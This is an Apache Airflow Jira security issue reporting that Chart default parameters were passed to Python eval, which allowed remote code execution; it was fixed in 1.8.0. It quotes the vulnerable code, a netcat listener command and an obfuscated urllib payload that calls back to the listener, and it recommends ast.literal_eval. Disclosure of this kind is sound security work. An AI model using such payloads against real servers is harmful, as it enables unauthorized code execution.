Uploaded image for project: 'Apache Airflow'
  1. Apache Airflow
  2. AIRFLOW-933

Security - Airflow Use of Eval Allows for Remote Code Execution

    XMLWordPrintableJSON

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 1.8.0
    • Component/s: None
    • Labels:
      None

      Description

      mpact: Any user with the ability to create or edit Charts may execute arbitrary code on the Airflow server.
      Location: The Default Parameters form eld sent when saving a Chart located at /admin/chart/new/
      Description: The Chart functionality allows for the definition of Default Parameters, which are baseline constraints for the values within a chart.
      This data is user-controllable and passed directly to a Python eval, which will execute code:

      def label_link(v, c, m, p): 
        try:
          default_params = eval(m.default_params) 
        except:
          default_params = {} 
        url = url_for(
          'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
          **default_params)
        return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
      

      Reproduction Steps:
      1. Configure a local instance of Airflow, and start a local netcat listener with the following shell command: nc -l 1337.
      2. Access Airflow as a user able to create or edit Charts.
      3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
      4. In its Default Parameters field, and enter-in the following example payload:
      (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (), None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, __g))]][0])(globals())

      5. Save the Chart, and observe that the application has made a network request to your listener, indicating that your code has executed.
      Remediation: Use the Python method ast.literal_eval (https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely parses its input, rather than executing it as code.

        Attachments

          Activity

            People

            • Assignee:
              amaliujia Rui Wang
              Reporter:
              amaliujia Rui Wang
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: